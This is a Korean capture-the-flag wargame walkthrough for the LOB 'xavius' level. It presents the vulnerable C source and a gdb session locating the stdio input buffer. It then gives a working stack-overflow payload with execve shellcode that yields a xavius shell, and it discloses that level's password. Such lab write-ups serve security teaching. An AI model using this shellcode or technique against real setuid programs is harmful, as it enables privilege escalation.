[19] nightmare -> xavius

2017. 11. 25. 17:30 SystemHacking/LOB(BOF원정대)





nightmare / beg for me

[nightmare@localhost nightmare]$ /bin/bash2

[nightmare@localhost nightmare]$ export SHELL=/bin/bash2



[ xavius.c ]

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
 
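/*
 * xavius.c — the challenge binary under analysis.  It reads one line into a
 * 40-byte stack buffer with a 256-byte limit (the overflow is deliberate; this
 * listing is an exhibit, not code to be hardened), then tries to reject the
 * usual return-address targets before wiping the stack.
 *
 * Guards on the overwritten return address (buffer+44..47):
 *   - most significant byte 0xbf -> stack address, rejected
 *   - most significant byte 0x08 -> program image address, rejected
 *   - forward scan from the address until "\x90\x90": if "leave; ret"
 *     (0xc9 0xc3) is seen first, the target is treated as a library function
 *     and rejected
 * After the checks, buffer + saved ebp, everything above the return address
 * up to 0xbfffffff, and 2960 bytes below the buffer are zeroed.
 * The checks only inspect the top byte and opcode bytes, and the memsets only
 * cover the stack, so a pointer into another mapping that holds the input
 * (the stdio input buffer the write-up shows at 0x40015000) passes all of
 * them — that is the gap the rest of the page walks through.
 * The constants (0xbfffffff, (int) pointer cast) assume the 32-bit layout.
 */
int main(void)
{
        char buffer[40];
        char *ret_addr;

        // overflow! (up to 255 bytes into a 40-byte buffer)
        fgets(buffer, 256, stdin);
        printf("%s\n", buffer);

        // buffer+47 is the most significant byte of the saved return address
        if(*(buffer+47) == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(*(buffer+47) == '\x08')
        {
                printf("binary image retbayed you, too!!\n");
                exit(0);
        }

        // check if the ret_addr is library function or not
        memcpy(&ret_addr, buffer+44, 4);
        while(memcmp(ret_addr, "\x90\x90", 2) != 0)     // end point of function
        {
                if(*ret_addr == '\xc9'){                // leave
                        if(*(ret_addr+1) == '\xc3'){    // ret
                                printf("You cannot use library function!\n");
                                exit(0);
                        }
                }
                ret_addr++;
        }

        // stack destroyer: buffer + saved ebp, then everything above the
        // return address up to the top of the stack mapping
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
        return 0;
}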
 


[ Stack ]

buffer          초기화

saved ebp    초기화

saved eip      0xbf(x) , 0x08(x)


[ gdb ]

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048714 <main>:       push   %ebp

0x8048715 <main+1>:     mov    %ebp,%esp

0x8048717 <main+3>:     sub    %esp,44

0x804871a <main+6>:     mov    %eax,%ds:0x8049a3c <-- stdin

0x804871f <main+11>:    push   %eax

0x8048720 <main+12>:    push   0x100

0x8048725 <main+17>:    lea    %eax,[%ebp-40]

0x8048728 <main+20>:    push   %eax

0x8048729 <main+21>:    call   0x8048408 <fgets>    => fgets(buffer,256,stdin)

.... 생략 ...

0x8048826 <main+274>:   add    %esp,12

0x8048829 <main+277>:   leave


fgets( buffer, 256, stdin )

=> stdin 입력을 받는다 -> cache memory ( 0x40... 주소 어딘가에 저장한다 ) -> 마지막으로 buffer에 저장한다



(gdb) b *0x8048829

Breakpoint 1 at 0x8048829

(gdb) run

Starting program: /home/nightmare/xavius.cp

aaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaa


Breakpoint 1, 0x8048829 in main ()

(gdb) x/4x 0x8049a3c

0x8049a3c <stdin@@GLIBC_2.0>:   0x401068c0      0x00000000      0x00000000      0x08049950

(gdb) x/4x 0x401068c0

0x401068c0 <_IO_2_1_stdin_>:    0xfbad2288      0x4001501d      0x4001501d      0x40015000

(gdb) x/4x 0x40015000

0x40015000:     0x61616161      0x61616161      0x61616161      0x61616161

(gdb)

0x40015010:     0x61616161      0x61616161      0x61616161      0x0000000a


* fgets의 캐시 메모리(stdio 내부 입력 버퍼, 0x40015000)에 쉘코드를 올리고 프로세스의 saved eip를 쉘코드의 주소로 덮어씌운다. 이 주소는 0x40으로 시작하므로 0xbf / 0x08 검사를 통과하고, 스택을 지우는 memset의 범위에도 들어가지 않는다.


[ payload ]

[nightmare@localhost nightmare]$ (python -c 'print "A" * 44 + "\x80\x50\x01\x40" + "\x90" * 300 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | ./xavius

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒P@▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

id

uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)

my-pass

euid = 519

throw me away

whoami

xavius


 buffer

 "A" * 40

 saved ebp

 "AAAA"

 saved eip

 &cachememory ( shellcode )